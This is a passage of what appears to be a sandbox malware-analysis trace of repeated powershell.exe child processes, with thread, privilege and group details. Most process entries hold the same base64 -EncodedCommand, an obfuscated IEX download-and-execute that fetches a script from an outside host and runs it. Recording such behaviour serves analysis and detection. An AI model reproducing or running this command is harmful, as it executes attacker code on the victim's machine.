	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1188
	os_tid = 0x1870

	[0608.740] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1270
	os_tid = 0x1ca8


Thread:
	id = 1280
	os_tid = 0x1cdc


Thread:
	id = 1640
	os_tid = 0x2258


Thread:
	id = 1656
	os_tid = 0x22a0


Thread:
	id = 1673
	os_tid = 0x2314


Thread:
	id = 1738
	os_tid = 0x1fbc


Process:
	id = "202"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x33b5e000"
	os_pid = "0x1884"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1189
	os_tid = 0x186c

	[0702.598] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1416
	os_tid = 0x15ac


Thread:
	id = 1451
	os_tid = 0x16d8


Thread:
	id = 1899
	os_tid = 0x257c


Thread:
	id = 1908
	os_tid = 0x25ac


Thread:
	id = 1950
	os_tid = 0x2664


Thread:
	id = 2065
	os_tid = 0x2484


Process:
	id = "203"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x598d000"
	os_pid = "0x1780"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1201
	os_tid = 0x14e0

	[0700.517] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1418
	os_tid = 0x1614


Thread:
	id = 1452
	os_tid = 0xbbc


Thread:
	id = 2103
	os_tid = 0x1e58


Thread:
	id = 2105
	os_tid = 0x1904


Thread:
	id = 2106
	os_tid = 0x156c


Process:
	id = "204"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x57c68000"
	os_pid = "0x1980"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1203
	os_tid = 0xcb8

	[0684.675] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1399
	os_tid = 0x1fbc


Thread:
	id = 1429
	os_tid = 0x1b94


Thread:
	id = 2127
	os_tid = 0x2424


Thread:
	id = 2128
	os_tid = 0x2420


Thread:
	id = 2129
	os_tid = 0x1c74


Process:
	id = "205"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x31fc4000"
	os_pid = "0x1a54"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "70"
	os_parent_pid = "0xbdc"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1206
	os_tid = 0x19c8

	[0612.942] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1271
	os_tid = 0x1cac


Thread:
	id = 1283
	os_tid = 0x1cf0


Thread:
	id = 1505
	os_tid = 0x1e74


Thread:
	id = 1512
	os_tid = 0x1d78


Thread:
	id = 1579
	os_tid = 0x2128


Thread:
	id = 1693
	os_tid = 0x23ac


Process:
	id = "206"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x68ff7000"
	os_pid = "0x19c4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "44"
	os_parent_pid = "0xd70"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1207
	os_tid = 0x19c0

	[0612.979] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1245
	os_tid = 0x16f0


Thread:
	id = 1264
	os_tid = 0x1c8c


Thread:
	id = 1747
	os_tid = 0x1b5c


Thread:
	id = 1755
	os_tid = 0x170c


Thread:
	id = 1793
	os_tid = 0x1fa0


Thread:
	id = 1890
	os_tid = 0x254c


Process:
	id = "207"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x78d7000"
	os_pid = "0x19b8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "40"
	os_parent_pid = "0xc80"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1208
	os_tid = 0x19b4

	[0632.199] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1381
	os_tid = 0x1f64


Thread:
	id = 1404
	os_tid = 0x1fdc


Thread:
	id = 2052
	os_tid = 0x2268


Thread:
	id = 2055
	os_tid = 0x1eb8


Thread:
	id = 2058
	os_tid = 0x874


Thread:
	id = 2094
	os_tid = 0x1dac


Process:
	id = "208"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0xc83b000"
	os_pid = "0x1a90"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1212
	os_tid = 0x17f0

	[0694.770] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1375
	os_tid = 0x1f44


Thread:
	id = 1394
	os_tid = 0x1fa8


Process:
	id = "209"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x72db000"
	os_pid = "0x1ab4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1217
	os_tid = 0x1a10

	[0707.569] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1426
	os_tid = 0x394


Thread:
	id = 1457
	os_tid = 0x1d8c


Thread:
	id = 1752
	os_tid = 0x1b78


Thread:
	id = 1758
	os_tid = 0x1c28


Thread:
	id = 1779
	os_tid = 0x21ac


Thread:
	id = 1884
	os_tid = 0x2520


Process:
	id = "210"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x42111000"
	os_pid = "0x1920"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1227
	os_tid = 0x4c8

	[0706.619] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1414
	os_tid = 0x18b8


Thread:
	id = 1445
	os_tid = 0x1878


Thread:
	id = 1770
	os_tid = 0x1f5c


Thread:
	id = 1773
	os_tid = 0xe54


Thread:
	id = 1796
	os_tid = 0x1e20


Thread:
	id = 1893
	os_tid = 0x2558


Process:
	id = "211"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x5252b000"
	os_pid = "0x195c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1236
	os_tid = 0x1960

	[0701.627] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1405
	os_tid = 0x1fe0


Thread:
	id = 1434
	os_tid = 0x1ca4


Thread:
	id = 2025
	os_tid = 0x2794


Thread:
	id = 2028
	os_tid = 0x27a0


Thread:
	id = 2031
	os_tid = 0x27ac


Thread:
	id = 2084
	os_tid = 0x1f60


Process:
	id = "212"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x74d44000"
	os_pid = "0x19ec"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "91"
	os_parent_pid = "0x1184"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1241
	os_tid = 0x15b8

	[0646.119] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1369
	os_tid = 0x1f24


Thread:
	id = 1386
	os_tid = 0x1f78


Process:
	id = "213"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x57e7c000"
	os_pid = "0x18a0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1242
	os_tid = 0x163c

	[0702.794] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1413
	os_tid = 0x19fc


Thread:
	id = 1444
	os_tid = 0x1838


Process:
	id = "214"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x2f1db000"
	os_pid = "0x1c6c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1260
	os_tid = 0x1c70

	[0709.265] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1419
	os_tid = 0x170c


Thread:
	id = 1453
	os_tid = 0x17c4


Process:
	id = "215"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x6f3dd000"
	os_pid = "0x1ce0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
